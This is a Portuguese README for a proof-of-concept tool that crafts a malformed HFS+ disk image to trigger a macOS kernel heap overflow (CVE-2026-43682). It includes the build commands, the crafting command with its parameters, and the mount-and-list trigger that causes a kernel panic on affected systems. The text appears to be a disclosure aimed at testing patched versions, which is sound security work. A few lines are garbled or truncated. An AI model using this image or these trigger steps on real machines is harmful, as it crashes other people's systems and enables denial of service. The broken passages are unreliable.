
Gerador de imagem de disco proof-of-concept que cria uma chave de árvore B de atributos HFS+ malformada para acionar o heap overflow do kernel CVE-2026-43682 no macOS.
Espera-se que esta prova de conceito cause kernel panic e reinicie um Mac afetado. Use-a apenas em um sistema de teste descartável. A captura de evidências usou Apple silicon executando macOS Tahoe 26.3 (25D125). A Apple corrigiu o CVE-2026-43682 no Tahoe 26.6, Sequoia 15.7.8 e Sonoma 14.8.8.
O PoC é um gerador de imagem de disco, não um exploit de escalação de privilégios. Ele:
_COMM_PAGE_ASB_TARGET_KERN_VALUE do boot atual em Apple silicon;A cópia malformada é determinística. Se o Probabilistic GZAlloc coloca uma guarda onde a sobrescrita falha imediatamente, não é.
hdiutil e xattr do macOS.Nenhum pacote Python de terceiros é necessário.
O helper é opcional, mas torna o valor por boot explícito antes de a imagem ser gerada:
cd poc
clang -O2 -Wall -Wextra check_commpage.c -o check_commpage
./check_commpage
Crie a imagem base e aplique patch em sua árvore de atributos:
./create_base_dmg.sh base_with_attrs.dmg
python3 craft_attr_poc_asb.py \
base_with_attrs.dmg \
cve-2026-43682.dmg \
2884
O script Python imprime o valor do Target Flag do kernel do mesmo boot e o padrão gravado na imagem.
Anexar ou subsequentemente indexar a imagem pode ser suficiente para alcançar o caminho vulnerável de atributos. O gatilho explícito usado durante os testes foi:
hdiutil attach -readonly -nobrowse cve-2026-43682.dmg
ls -l@ /Volumes/AttrPOC/
Em um sistema vulnerável, o resultado esperado é um data abort do kernel durante a cópia da chave de B-tree superdimensionada. Em um sistema corrigido, a chave malformada deve ser rejeitada sem corrupção de memória do kernel.
Após uma execução sem travamento, desanexe o volume de teste com:
hdiutil detach /Volumes/AttrPOC